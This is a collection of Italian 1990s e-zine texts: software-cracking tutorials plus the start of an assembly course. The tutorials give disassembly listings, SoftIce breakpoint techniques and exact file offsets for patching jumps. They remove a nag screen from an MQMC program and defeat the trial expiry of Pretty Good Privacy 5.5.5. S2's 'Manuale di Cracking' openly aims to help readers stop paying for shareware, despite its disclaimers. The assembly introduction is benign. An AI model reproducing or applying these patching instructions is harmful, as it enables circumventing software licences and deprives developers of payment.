:0048A352 mov edx, 0048A630
:0048A357 call 00403E40
:0048A35C mov eax, dword ptr [ebp-38]
:0048A35F call 00407F84
:0048A364 mov dword ptr [ebp-54], eax
:0048A367 fild dword ptr [ebp-54]
:0048A36A add esp, FFFFFFF8
:0048A36D fstp qword ptr [esp]
:0048A370 wait
:0048A371 lea eax, dword ptr [ebp-04]
:0048A374 call 00409D38
:0048A379 cmp dword ptr [ebp-04], 00000000
:0048A37D je 0048A3D9
:0048A37F mov eax, dword ptr [ebp-04]
:0048A382 call 0040A4B0
:0048A387 fstp qword ptr [ebp-1C]
:0048A38A wait
:0048A38B fld qword ptr [ebp-0C]
:0048A38E fcomp qword ptr [ebp-1C]
:0048A391 fstsw ax
:0048A393 sahf
:0048A394 jnb 0048A3D9 <-- Jump if not below... interessante non vi sembra?
:0048A396 mov eax, dword ptr [0049C244] Guardate DOVE salta: DOPO la CALL
:0048A39B cmp dword ptr [eax], 00000000 a :0048A3AE!! Bene bene...
:0048A39E je 0048A3AC
:0048A3A0 mov eax, dword ptr [0049C244]
:0048A3A5 mov eax, dword ptr [eax]
:0048A3A7 call 00430A74

* Jump at Address:
|:0048A39E(C)
|
:0048A3AC push 00000000

* Reference To: user32.MessageBeep, Ord:0000h
|
:0048A3AE Call 00406C9C
:0048A3B3 push 00000032
:0048A3B5 mov cx, word ptr [0048A644]
:0048A3BC mov dl, 02


* Possible StringData Ref from Code Obj ->"MQMC323.0"
|
:0048A3BE mov eax, 0048A650
:0048A3C3 call 00444C24
:0048A3C8 mov eax, dword ptr [0049C28C]
:0048A3CD mov eax, dword ptr [eax]
:0048A3CF call 00432A34
:0048A3D4 jmp 0048A5A7

* Jump at Addresses:
|:0048A37D(C), :0048A394(C)
|
:0048A3D9 mov cx, word ptr [ebp-28]
:0048A3DD mov dx, word ptr [ebp-26]
:0048A3E1 mov ax, word ptr [ebp-24]
:0048A3E5 call 00408F88
:0048A3EA fstp qword ptr [ebp-5C]
:0048A3ED wait
:0048A3EE mov cx, word ptr [ebp-22]
:0048A3F2 mov dx, word ptr [ebp-20]
:0048A3F6 mov ax, word ptr [ebp-1E]
:0048A3FA call 00408F88
:0048A3FF fsubr qword ptr [ebp-5C]
:0048A402 call 00402A98
:0048A407 mov word ptr [0049DC04], ax
:0048A40D cmp word ptr [0049DC04], 001E
:0048A415 jbe 0048A485
:0048A417 mov eax, dword ptr [0049C244]
:0048A41C cmp dword ptr [eax], 00000000
:0048A41F je 0048A42D
:0048A421 mov eax, dword ptr [0049C244]
:0048A426 mov eax, dword ptr [eax]
:0048A428 call 00430A74


Infine in :0048A42F. Attraccherete qui:

* Jump at Addresses:
|:0048A37D(C), :0048A394(C)
|
:0048A3D9 mov cx, word ptr [ebp-28]
:0048A3DD mov dx, word ptr [ebp-26]
:0048A3E1 mov ax, word ptr [ebp-24]
:0048A3E5 call 00408F88
:0048A3EA fstp qword ptr [ebp-5C]
:0048A3ED wait
:0048A3EE mov cx, word ptr [ebp-22]
:0048A3F2 mov dx, word ptr [ebp-20]
:0048A3F6 mov ax, word ptr [ebp-1E]
:0048A3FA call 00408F88
:0048A3FF fsubr qword ptr [ebp-5C]
:0048A402 call 00402A98
:0048A407 mov word ptr [0049DC04], ax
:0048A40D cmp word ptr [0049DC04], 001E
:0048A415 jbe 0048A485 <-- Jump if below or equal... WOW un altro che salta
:0048A417 mov eax, dword ptr [0049C244] DOPO la CALL!!
:0048A41C cmp dword ptr [eax], 00000000
:0048A41F je 0048A42D
:0048A421 mov eax, dword ptr [0049C244]
:0048A426 mov eax, dword ptr [eax]
:0048A428 call 00430A74

* Jump at Address:
|:0048A41F(C)
|
:0048A42D 6A00 push 00000000

* Reference To: user32.MessageBeep, Ord:0000h
|
:0048A42F Call 00406C9C
:0048A434 lea ecx, dword ptr [ebp-38]
:0048A437 mov edx, 00000006
:0048A43C mov eax, 000028EA
:0048A441 call 00489F6C
:0048A446 mov edx, dword ptr [ebp-38]
:0048A449 lea eax, dword ptr [ebp-50]
:0048A44C call 00404C60
:0048A451 lea ecx, dword ptr [ebp-50]


* Possible StringData Ref from Code Obj ->"0001"
|
:0048A454 mov edx, 0048A620
:0048A459 mov eax, dword ptr [ebx+00000220]
:0048A45F call 0045F848
:0048A464 push 00000032
:0048A466 mov cx, word ptr [0048A644]
:0048A46D mov dl, 02

* Possible StringData Ref from Code Obj ->"MQMC323.0"
|
:0048A46F mov eax, 0048A650
:0048A474 call 00444C24
:0048A479 mov eax, dword ptr [0049C28C]
:0048A47E mov eax, dword ptr [eax]
:0048A480 call 00432A34

* Jump at Addresses:
|:0048A281(U), :0048A415(C)
|
:0048A485 call 00409148
:0048A48A call 00402A98
:0048A48F lea ecx, dword ptr [ebp-38]
:0048A492 mov edx, 00000004
:0048A497 call 00489F6C
:0048A49C mov edx, dword ptr [ebp-38]
:0048A49F lea eax, dword ptr [ebp-50]
:0048A4A2 call 00404C60
:0048A4A7 lea ecx, dword ptr [ebp-50]


OK perfetto... lavoro praticamente finito... per eliminare il nag basta
cambiare i 3 JUMP indicati sopra in JMP incondizionali. Come fare ve l'ho
gi... spiegato sopra... e infine rinominare prima il file MQMC.exe come cazzo
volete, poi la sua copia in MQMC32.exe. Tutto chiaro?
Bene: PROGRAMMA CRACKATO.

RIASSUMENDO

INDIRIZZI HA CAMBIARE:

Per il programma: 48A1ED (OFFSET 895ED da je a jmp).

Per il nag-screen: 48A1E3 (OFFSET 895E3 da jne a jmp), 48A394 (OFFSET 89794
da jnb a jmp), 48A415 (OFFSET 89815 da jbe a jmp).

OK ho finito... uff che fatica... non pensavo che scrivere un tute fosse cos
lungo...
Bene, spero che esso vi sia stato utile, io da parte mia ho cercato di
scriverlo nel migliore dei modi, cioŠ semplice e comprensibile a tutti.
Se vi piace, non vi piace, volete insultarmi, ecc.... basta che mandiate
un'e-mail all'indirizzo sotto.

Vorrei ora ringraziare un bel po' di persone..... ometto di dilungarmi troppo
sulle rispettive motivazioni, altrimenti questa parte viene pi- lunga
dell'Essay...
Ringrazio e saluto: Quequero innanzi tutto (spero di riuscire a vederti prima
o poi in IRC! :-))) per aver publicato il mio tute sull'UIC, per l'impegno
che sta dimostrando con l'UIC stessa e perchŠ mi risponde a tutte le domande
che gli faccio: ciao QUEEEE!!, [aLT255], ^courier, mOoNsHaDoW e WhiteFly,
sempre molto disponibili su IRC, xOANINO (il mito), tutti i Ringzer0 (per i
loro tute e perchŠ sono GRAAANDIII), in generale tutto il chan di #crack-it e
tutti gli Attila_Hack members, in particolare BoBo, che mi ha fatto partecipe
di questa iniziativa e che mi ha permesso di pubblicare qui i miei tute.
Grazie BOBO!! Sei un amicoooo :) !!
Saluto anche DFX, great friend nonchŠ compagno di scuola, il Morando (altro
amico) e coloro che sono arrivari a leggere fino in fonto questo tute...
GRAZIEEEEE!!!! E mi raccomando: citando una frase di...azz chi era... boh...
non so, spero che costui mi perdoner… per il copyright violato... ricordate:
"A day without learning is a lost day..." Impariamo, gente, impariamo.

SeE YoU sOoN,


****************************************************
* *
* Ritz *
* Eclyps3@excite.com *
* - The way is made clear when viewed from above - *
* On ICQ: 41793377 *
* On IRC: Ritz *
* *
****************************************************







+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-





CRACCARE PRETTY GOOD PRIVACY 5.5.5


*******************************
* *
* Pretty Good Privacy 5.5.5 *
* *
* by Ritz *
* *
*******************************

******************************************************************************
DESCLAIMER LEGALE:
Ascoltatemi bene prima di leggere questo articolo: esso Š stato scritto a PURO
scopo DIDATTICO: io, Ritz, non incoraggio chi volesse servirsene per scopi
illegali; inoltre non mi assumo alcuna responsabilit... se vi autodistruggete i
progammi. CAPITTOOOO?!
******************************************************************************

Allora, in questo tute cercher• di spiegarvi come a volte le protezioni di un
programma possano rivelarsi pi- semplici del previsto... l'unico problema Š
sapere dove CERACRLE!!

Il proggy in questione Š Pretty Good Privacy 5.5.5: penso sappiate tutti a
che serve: Š un proggy di crittazione a chiave asimmetrica, cioŠ per crittare
e decrittare non si usa la stessa chiave... molto sicuro quindi per
scambiarsi ad esempio e-mail senza essere sgamati. Consiglio di acquistarlo
perchŠ dopotutto bisogna ricompensare i programmatori della Network
Associates che hanno fatto un cos buon lavoro (a parte la protezione
facilmente scazzabile :)))). Lo trovate cmq dappertutto.

OK se parte...
Installato il PGP? S? Bene, avviatelo... anzi no... prima cavate l'icona dal
Tray, quindi portate la data del Windouz avanti di 46 anni. Riavviate il PGP.
Vi appare un nag screen del cazzo che vi dice che i prog Š scaduto? Bene,
siete a cavallo! Entrate in Sice con CTRL+D e mettete un bpx messageboxa per
intercettare l'API che fa apparire il messaggio. Uscite dal Sice e caricate
il Pretty Bad Protection (scherzo eh?) da Start/Programmi/Pretty Good
Privacy/PGPtools.

Ora ci dovremmo aspettare che il debugger poppi prima della schermata:
INFATTI! BINGO! Premete F11 per entrare nella DLL (o l'EXE) che genera la
chiamata, e, azz, appare la schermata del proggy... pork putt, come mai non
siamo entrati nel codice? Boh, cliccate su OK e.... il SoftIce ripoppa!
Questa volta diretamente su una DLL del PGP: PGP55cd.dll, localizzata in
C:\WINKAZ\SYSTEM, e precisamente in questo punto:

:0048A202 POP EDI

Bene, ora non vi resta che fare una cosa: disassemblate la cara PGP55cd.dll
col Dasm. Fatto? VabbŠ... tanto per sicurezza andiamo a guardare le String
Data References, sar… impossibile trovare qualcosa, cmq tentiamo: clicchiamo
sul secondo pulsante della barra partendi da destra, osserviamo un po' le
stringhe... hum hum... mumble mumble... osservate un po' la nona partendo dal
basso: "Thank you for evaluating Pretty", cazzo ma non Š la parte iniziale
del testo della messagebox da fottere? fateci doppio clic sopra; vi troverete
qui:

* Jump at Address:
|:10002814(C)
|
:10002867 cmp dword ptr [esp+24], 00000002
:1000286C jne 10002876
:1000286E add dword ptr [esp+08], 00278D00

* Jump at Address:
|:1000286C(C)
|
:10002876 cmp esi, dword ptr [esp+08]
:1000287A jbe 10002881 <--- Mi suona sinistro jump if below or
equal...
* Possible Reference to String Resource ID=00001: "General strings"
|
:1000287C mov edi, 00000001

* Jump at Address:
|:1000287A(U)
|
:10002881 mov eax, edi
:10002883 pop edi
:10002884 pop esi
:10002885 add esp, 00000014
:10002888 ret


:10002889 nop
:1000288A nop
:1000288B nop
:1000288C nop
:1000288D nop
:1000288E nop
:1000288F nop

* Referenced by a CALL at Address:
|:100027A2
|
:10002890 sub esp, 00000400
:10002896 mov ecx, 00000040
:1000289B lea eax, dword ptr [esp]
:1000289F push esi
:100028A0 push edi

* Possible StringData Ref from Data Obj ->"Thank you for evaluating Pretty "
->"Good Privacy. The 60"
|
:100028A1 mov esi, 100280F8
:100028A6 lea edi, dword ptr [esp+08]
:100028AA repz
:100028AB movsd
:100028AC mov ecx, dword ptr [esp+0000040C]
:100028B3 push 00000000
:100028B5 movsw

Visto bene il codice...? Dunque a :100028A1 viene generata il nag-screen,
quindi nei dintorni ci dovrebbe essere qualcosa di utile... vediamo un po'...
osservate :1000287A, un jbe.. cambiandolo in je o JMP forse... naaaa troppo
facile... cmq vale la pena tentare, vero? Segnatevi l'OFFSET (1C7A) e
cambiatelo con HIEW (non vi spiego come si fa, se non lo sapete leggete
l'altro mio tutorial :))): provate a mettere, che so, jump incondizionale,
tanto 99% non funzioner…... fatto? Bene, avviate il PGP, e pork putt azz tr!!
Programmillo crackato!! Facile no? Beh, che dire, tute finito.

Non ho altro da aggiungere. VabbŠ, non mi resta che augurarvi
H A P P Y C R A C K I N G!!!


N.B.: ricordatevi di riportare indietro la data di WINCESS dopo avre finito
tutto eh?

P.S.: mi Š venuta in mente appena ora una cosa interessante che non centra
nulla col cracking: il calendario di Windozz dovrebbe fermarsi al 2099: se
io imposto la data al 31 dicembre 2099 e poi il giorno dopo riavvio che
succede? Magari vengo trasportato in un'altra dimensione dove tutto Š
posseduto da Microsoft e il dittatore assoluto Š Bill Gates... meglio lasciar
perdere... se qualcuno ha il coraggio di farlo... mi scriva per comunicarmi i
risultati... :-))))

Vorrei ringraziare e salutare anche questa volta Quequero (ma vi pensate,
mi ha pubblicato anche questo articolo: Š semplicemente GRANDEEE), i ring0,
il chan #crack-it, gli Attila_Hack members (spec. BoBo), DFX e il Moran'.

Grazie inoltre a chi Š arrivato a leggere fino a qui e ne ha tratto
profitto :)). Per qualsiasi cosa, scrivetemi [se usate il PGP (per il crack
basta che cerchiate in rete... ihihihihih) mandatemi la vostra chaive].

ZeE yOu ZoOn,


****************************************************
* *
* Ritz *
* Eclyps3@excite.com *
* - The way is made clear when viewed from above - *
* On ICQ: 41793377 *
* On IRC: Ritz *
* *
****************************************************






+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



=====================================================================
Manuale di Cracking - by S2 Prima parte
=====================================================================

1. Prefazione
Per iniziare vorrei subito dire che tutto quello che segue non e'
assolutamente da prendere sul serio e non e' assolutamente da fare o provare.
Anzi, e' assolutamente illegale, e quindi, se non volete dire "ciao" a un
pulotto che suona al vostro campanello perche' siete diventati pirati
informatici non fatelo.

Bene bene bene... Detto questo un ciao a tutti voi che avete una gran voglia
di fottere tutti quei programmini Shareware del cazzo che dopo trenta giorni
di evaluation non funzionano piu', o quelli che danno possibilita' limitate a
meno che non inseriate la mistica password associata all'user name inserito
ecc... vi siete proprio rotti le balle... vero? Io almeno, confesso che me le
sono rotte, e quindi... aguzzo l'ingegno e inculo tutte quelle softwarehouse
che ti chiedono 20$ per il loro programma. Ma se vi devo dire la verita' non
lo faccio solo per questo, ma anche per un altro motivo: Quando riesco a
mettere insieme tutti i pezzi del puzzle, e vedo sullo schermo del mio bel pc
una finestrella che mi dice "Tnx for registering" mi sento un grande. Perche'
penso di essere uno dei pochi su questa faccia della terra a essere in grado
di farlo, e quindi mi sento un figo. Comunque, quando poi ripenso ai 20$
risparmiati sono ancora piu' felice... Quindi questo manuale non e' da vedere
come un manuale al crackaggio, ma piu' come un manuale della felicita'... che
umorista che sono... io non devo passare tutte queste ore davanti al pc...
poi mi metto a scrivere stronzate del genere... sono proprio fuso... vabbe'...
mi accendo una cicca, va'.

In ogni caso questo non e' un manuale di Assembler, quindi non aspettatevi
particolari sull'asm, quelli li trovate in inglese in giro per Internet, ma
e' una guida al crackaggio. Quello che voglio insegnare non e' come trovare le
password associate agli user name, ma semplicemente come avere l'accesso. Per
riuscire a scoprire la password, avete bisogno di conoscere un sacco di asm e
soprattutto dovete farvi un pacco cosi' di matematica... ma questo e' un altro
file... forse in futuro ve lo scrivero'... Adesso andiamo al sodo e cominciamo:

2. Breve introduzione all'Assembler
Allora. Per crackare un programma bisogna disassemblarlo, cioe' tradurre il
programma .exe o .com in una lista di istruzioni da noi comprensibili, per
poi modificarlo in modo da fargli credere di aver inserito la password
giusta, o che i 30 giorni non sono passati e cosi' via. Siccome per
disassemblare i programmi da crackare si usa il SoftIce, che disassembla i
programmi in Assembler (asm), bisogna sapere questo linguaggio. Voi direte,
"ma non possiamo tradurre il programma in italiano, cosi' lo capiscono
tutti?". E io vi rispondo, ci sto lavorando, ma quando avro' finito lo
distribuiro' in una versione Shareware incrackabile! Tje'!
Ok. Ora vi spiego un po' come funziona l'Assembler:

2.1 I registri
La CPU del computer e' divisa in diversi registri, che ora vi spiego uno per
uno cosa sono e come si chiamano, e servono per memorizzarci dei dati. I
registri in tutto sono quattro, e si chiamano

AX - Accumulatore
BX - Base register
CX - Contatore
DX - Data register

Ognuno di questi registri puo' essere suddiviso in una parte alta e una bassa.
Per esempio AX si suddivide in AL (Low) e AH (High). Nella CPU del Pentium,
che lavora a 32 bit, i registri si chiamano EAX, EBX e cosi' via. Mi spiego
meglio con questo schemino:

AL = 8 Bit (parte bassa del registro AX)
AH = 8 Bit (parte alta del registro AX)
AX = 16 Bit (formato da AL e AH messi insieme)
EAX = 32 Bit (formato da AX e altri 16 Bit che pero' non sono direttamente
acessibili dall'utente)

Ovviamente questa suddivisione vale anche per BX, CX e DX.
Poi ci sono i segment register:

CS - Vuol dire Code segment. E' l'area di memoria nella quale si trova il
programma che state modificando. L'indirizzo CS:IP e' l'istruzzione che
state per eseguire.

DS - Il Data segment. La parte di memoria nella quale si trovano i dati. La
CPU di solito vi accede solo in lettura.

ES - Extra segment. In questa area di memoria la CPU vi accede in scrittura.

IP - Instruction pointer. E' l'indirizzo dell'istruzione che state per
eseguire.

SS - Stack segment. Questa e' roba complicate... non vi serve per i vostri
scopi crackistici.

SI - Source Index. E' un puntatore.

DI - Destination index. Un'altro puntatore.

BP - Base pointer. Questo viene usato insieme allo SS.

SP - Stack pointer. Serve a puntare una locazione all'interno dello Stack. E'
usato insieme a SS.

Questi sono i registri della CPU, le informazioni qui riportate, non sono
complete, ma non staro' neanche qui' a completarle, perche' per i nostri loschi
scopi non sono di importanza rilevante. Se proprio volete saperne di piu'
andate a leggervi una delle tante guide sull'Assembler che si trovano in giro
per Internet.

2.2 I flag
Servono ad indicare se un jump condizionale (vedi sezione istruzioni) deve
essere eseguito o no. Per esempio

CMP AL, BL ........... Confronta il registro al con bl
JZ 3F1D ................... Salta se zero a 3F1D

La prima istruzione esegue un confronto tra AL e BL. Se sono uguali il flag Z
diventa 1 (attivo), nel caso contrario invece, 0 (disattivo).
La seconda istruzione salta all'indirizzo specificato se il flag Z e' 0.
Se per esempio in AL abbiamo il numero di giorni da quando stiamo usando il
programma, e in BL, il numero di giorni che il programma deve funzionare,
modificando il flag zero possiamo far credere al programma che i giorni ancora
non sono finiti, e quindi possiamo continuare ad usare il programma. Capito?

Mettiamo il caso:

AL = 3 .................... Stiamo usando il prog. da 3 giorni
BL = 1E .................. (1E = 30 in Hex) Per quanti giorni possiamo usare
il prog.

Premesso questo, ora eseguiamo i comandi:

CMP AL, BL ........... Confronta il 3 con il 30d
JZ 3F1D .................. Se i due sono uguali (tutti e due 30, flag Z = 1)
salta a 3F1D e ci dice di registrare il programma

Tutto chiaro? Penso di si... queste sono cazzate da capire in fondo, credo.

2.3 Le istruzioni
MOV Dest. Source - Sposta un valore da Source a Dest. Per esempio MOV AL,
BL - Sposta il contenuto di BL in AL.

CMP var1, var2 - Confronta i due valori di var1 e var2. Per esempio CMP AL,
BL - Confronta il contenuto di AL con quello in BL. Semplice no? Be'...
questa istruzione funziona come una sottrazione: il valore in var2 viene
sottratto da var1. Cioe', se ho 3 in AL, e 8 in BL, il risultato sara'
3 - 8 = -5. Il flag Carry (C) si attivera' (questo flag si attiva ogni
volta che il numero e' negativo). Nel 99,9% dei casi questo comando viene
usato per confrontare la password da voi inserita e quella giusta, oppure
come nell'esempio sopra, i giorni trascorsi, e quelli trascorribili (ma
esiste questa parola?).

JMP label - Questa e' l'istruzione piu' bella. Esegue un salto all'indirizzo
specificato. Lo troverete, di solito dopo un CMP. Ci sono diverse
variazioni di questo comando, che ora vi elenchero', e vanno tutte a
controllare i flag Z, O, S, C e P. Nella sua forma piu' semplice e' JMP
label, cioe', salta a label qualsiasi siano i valori dei flag. Ponendo
il comando CMP AX, BX, abbiamo:

JNZ - Jump if not zero, AX diverso da BX

JZ - Jump if zero, AX uguale a BX

JB - Jump if below, AX < BX, C = 1

JA - Jump if above, AX > BX, C = 0

JNGE - Jump if not greater or equal, AX<=BX, S diverso da 0

JGE - Jump if greater or equal, AX=>BX, S = 0

JLE - Jump if less or equal, AX<=BX, Z=1 o S=F

Che palle! Vabbe'... cen'e' altri di 'sti' JMP, ma non credo che vi servano per
i vostri loschi scopi, quindi non preoccupatevi... anche se non li sapete non
cambia un cazzo. Comunque, se proprio vi interessano li trovate in un
qualsiasi manuale di Assembler in giro per Internet.

CALL label - Richiama una routine che si trova all'indirizzo specificato con
label. Per esempio CALL 1F3D, esegue la routine a CS:1F3D. Poi,
eseguendo la routine, quando trova un'istruzione RET torna
all'istruzione dopo CALL. Facile no? Di solito, quelle chiamate
con CALL sono delle routine che controllano il testo da voi
inserito, oppure criptano la password che avete inserito ecc.

INT n - Esegue un'interruzione. Un'interruzione e' come una routine, pero' non
e' nel programma, ma da qualche parte nel DOS, o nel BIOS, dipende dalla
n. Per esempio quei giochini vecchissimi che chiedevano il KeyDisk
inserito usavano l'int 13 per vedere se c'e'ra il dischetto inserito o no
ecc. Comunque cazzate... in Windows gli INT non esistono quasi piu'.

That's it. Questi sono i comandi principali dell'asm. Spero che gli abbiate
capiti, perche' senza questi poi non ci capirete una minchia nel SoftIce.
Anzi... se volete approfondire, c'e' il Assembly language foundamentals
tutorial che aspetta solo di essere letto e studiato. I comandi che vi ho
dato qui sono pure pochi, ma comunque quelli piu' importanti.

3. L'uso del debugger
Ok. Aspettate un'attimo che mi accendo una cicca... fumo troppo... ma vabbo'.
Per spiegarvi come funziona il SoftIce vi traduco semplicemente le parti piu'
importanti della guida che trovate anche compattata nel file SoftIce.zip.
Cosi' risparmio la fatica di pensare ai comandi.
Allora... intanto i consiglio di mettere una robe del genere alla fine del
vostro Autoexec.bat:

choice /tn,2 Caricare softice?
if errorlevel 2 goto win
c:\softice\winice (qui' mettete la righa che vi aggiunge il SoftIce nell'installazione)
goto end

:win
choice /ts,1 Caricare windows?
if errorlevel 2 goto end
win

:end

Ed ora passiamo ai comandi principali del SoftIce:

3.1 I comandi del SoftIce
E' impossibile debuggare bene senza sapere come funzionano i BreakPoints (Bp).
Un bp e' un'istruzione per la cpu che le dice di fermare l'esecuzione del
programma dopo un accesso ad una certa locazione di memoria, oppure dopo
certi eventi del programma stesso e da' il controllo al debugger. Quando setti
un bp del SoftIce e poi torni al programma che stai usando, SoftIce compare
automaticamente quando la condizione per la quale e' settato il bp e'
verificata.

3.1.2 BreakPoint
Bc # : Clear Breakpoint--elimina un breakpoint messo in precedenza nel
Soft-Ice; devi sapere il numero del bp...

Bd # : Disable Breakpoint--disabilita il bp ma non lo cancella; devi sapere
il numero del bp...

Be # : Enable Breakpoint--abilita il bp che hai disabilitato in precedenza;
devi sapere il numero del bp...

Bl : List Breakpoints--mostra una lista di tutti i bp settati nel softice,
il loro stato (abilitato, disabilitato), e il loro numero.

Bmsg : Break on Windows Message. Sintassi: BMSG window handle L begin-message
end-message

Bpint : Break on Interrupt. Funziona solo con le interruzioni trattate da IDT
(95/NT). Sintassi: BPINT int-number

Bpio: Si ferma quando c'e' un accesso in lettura o scrittura ad una porta I/O
con un certo indirizzio. Sintassi: BPIO port [R|W|RW] [EQ|NE|GT|LT|M
value] [c=count]

Bpm: Si ferma quando c'e' un accesso alla memoria in lettura (read), scrittura
(write), o esecuzione (execution). Sintassi: BPM[B|W|DW] address
[R|W|RW|X]

Bpx : Break on execution. Sintassi: BPX address/symbol [c=count]
[EQ|NE|GT|LT|M value] [c=count]

Bpr : Break on memory range. Sintassi: BPR start-address end-address
[R|W|RW|T|TW] [expression]

Bprw : Break on program/code segment. Sintassi: BPRW module-name|selector
[R|W|RW|T|TW] [expression]

3.1.2 Steppare attraverso il programma
Debuggare in se' vuol dire eseguite una istruzione alla volta di un programma
in modo da poter vedere come cambiano la memoria, i registri, i flags e le
variabili. I principali comandi per farlo sono:

P : Esegue una istruzzione e vede le CALL come una istruzzone sola. Shortcut:
il tasto F10.

P RET : Esegue il programma finche non trova un'istruzione RET. Shortcut: il
tasto F12.

T : Esegue una istruzzione. Shortcut: il tasto F8.

3.1.3 Visualizzare informazioni sul sistema
Addr : Visualizza o cambia ad un contesto di indirizzi.

Class : Visualizza informazioni sui Windows Classes.

CPU : Visualizza i registri della CPU.

Exp : Carica/Visualizza i simboli esportati da un DLL.

GDT : Visualizza la Global Descriptor Table.

Heap : Visualizza i Global Heap di Windows.

Heap32 : Visualizza/attraversa i Global Heap di Windows.

HWND : Visualizza informazioni sui Windows Handles.

IDT : Visualizza la Interrupt Descriptor Table.

LDT : Visualizza la Local Descriptor Table.

LHeap : Visualizza i Windows Local Heap.

Map32 : Visualizza una mappa di memoria di tutti i moduli a 32bit caricati
in memoria.

MapV86 : Visualizza la mappa di memoria DOS memory della macchina virtuale
corrente.

Mod : Mostra la Windows Module List.

Page : Mostra le Page Table information.

Proc : Visualizza informazioni su un processo.

Stack : Visualizza una call stack.

Sym : Imposta o visualizza un Symbol.

Task : Mostra Windows Task List.

VCall : Mostra i nome e indirizzi di una routine VxD chiamabile con CALL.

VM : Visualizza informazioni sulle macchine virtuali.

VXD : Visualizza la mappa Windows VXD.

.VMM : Chiama il VMM Debug Informational Services menu.

.VPICD : Chiama il VPICD Debug Information Menu.

.VXDLDR : Mostra informazioni VXD.

WMSG : Visualizza i nomi e numeri dei messaggi Windows.

Inoltre, cosa molto importante, che stavo quasi per dimenticarmi, c'e' da dire
che nel SoftIce ci entrate con CTRL-D. Figo, no?

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
La seconda parte di questo fantastico tute sarà presente su Wannabe 2
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


__ _
/ _\ ___ ___(_) ___ _ __ ___
\ \ / _ \_ / |/ _ \| '_ \ / _ \
_\ \ __// /| | (_) | | | | __/
\__/\___/___|_|\___/|_| |_|\___|

___ BoBo & LaNdo _
/ _ \_ __ ___ __ _ _ __ __ _ _ __ ___ _ __ ___ (_)_ __ __ _
/ /_)/ '__/ _ \ / _` | '__/ _` | '_ ` _ \| '_ ` _ \| | '_ \ / _` |
/ ___/| | | (_) | (_| | | | (_| | | | | | | | | | | | | | | | (_| |
\/ |_| \___/ \__, |_| \__,_|_| |_| |_|_| |_| |_|_|_| |_|\__, |
|___/ |___/






Introduzione: by b0nu$



===========================================================================
Questi file sono protetti dal diritto d'autore e sono liberamente riproducibili
a condizione di non farne uso comemrciale o economico o per fine di lucro senza
la preventiva autorizzazione dell'autore. In ogni caso deve sempre essere indicato
il nome dell'autore e il suo indirizzo. Ogni altra modalita' di utilizzo deve
considerarsi contraria alla volonta' dell'Autore.
===========================================================================


Al giorno d'oggi esistono molti linguaggi di programmazione ad alto livello con i
quali è possibile creare programmi complessi, piu' o meno efficienti e con i quali
è possibile programmare ogni parte di un computer, ma se si vuole sfruttare al meglio
le risorse messe a disposizione dal PC , se si vuole scrivere routine veloci allora
l'unico linguaggio adatto è ancora il buon vecchio ASSEMBLY.
Programmando in Assembly si ha il controllo completo del computer ogni singolo bit
di ogni singolo registro è nelle tue mani, hai il potere assoluto sulla macchina,
però ...
Però e anche vero che programmare in Assembly non è del tutto facile, si deve tener
conto di moltissime cose, un piccolo particolare trascurato ha come conseguenza il
CRASH del sistema!! Una prerogativa della programmazione in Assembly è la conoscenza
dell'Hardware sottostante , è quindi necessario conoscere la struttura della CPU dei
registri delle porte e delle schede presenti per poterle programmare.
In questa serie di tutorial vorrei cercare di spiegare per passi la programmazione
in Assembly cominciando dalle cose cose piu' semplici e via via andando sempre piu
dentro nella programmazione dei vari componenti di un moderno Personal Computer.
Vi renderete conto voi stessi che ad un certo punto più che un corso di programmazione
diventerà un corso di Hardware per calcolatori. I tools di cui avrete bisogno sono un
COMPILATORE e un LINKER , i miei esempi sono scritti per il compilatore della Borland
TASM 3.1 ma si possono facilmente adattare ad altri compilatori.
Inoltre dovreste procuravi una documentazione degli interrupt del BIOS e del DOS
reperibile via FTP al sito : X2FTP.OULU.FI (Si tratta della famosissima lista di
Ralph Brown).
Infine si serve un editor di testo, va bene anche l'EDIT del DOS ma vi consiglio
un ambiente integrato per programmare in Assembly reperibile anche questo su internet
al sito WWW.INF.TU-DRESDEN.DE/~OK3 , si tratta dell'ASM EDITOR scritto da Olaf Krusche
e Tilo Elstner ( questo vi facilita molto il lavoro di compilazione e linkaggio).
Beh ora basta con le chiacchiere cominciamo ad addentrarci nel magnifico mondo della
programmazione in ASSEMBLY.... buon lavoro!


Sistemi di numerazione ed elementi di logica: by b0nu$


Ogni buon programmatore dovrebbe conoscere almeno 2 sistemi di numerazione oltre
quello decimale imparato alle scuole elementari: il sistema BINARIO e quello ESADECIMALE.
Il sistema di numerazione binario è particolarmente legato ai calcolatori in quanto
essi possono riconoscere solo segnali aventi due valori : uno alto e uno basso; per
cui si associa al valore alto la cifra binaria 1 e a quello basso la cifra binaria 0
(oppure H e L, o ancora VERO e FALSO).
Infatti nel sistema binario esistono solo due cifre 0 e 1 appunto e i numeri ma anche
tutte le altre informazioni vengono rappresentate con sequenze di Zero e di Uno.
Il sistema di numerazione binario è un sistema posizionale come quello decimale, cosa
vuol dire: consideriamoli numero decimale 237 , esso può essere scomposto in questo modo:

237 = 2 * 10^2 + 3 * 10^1 + 7 * 10^0

ossia le cifre del numero vengono moltiplicate per le potenze di dieci (da cui decimale)
crescenti da destra verso sinistra. I numeri binari vengono costruiti nello stesso modo
solo che invece di potenze di 10 si usano le potenze di 2, quindi considerando il seguente
numero binario, scomponendolo ed effettuando i calcoli si ottiene il corrispondente numero
decimale :

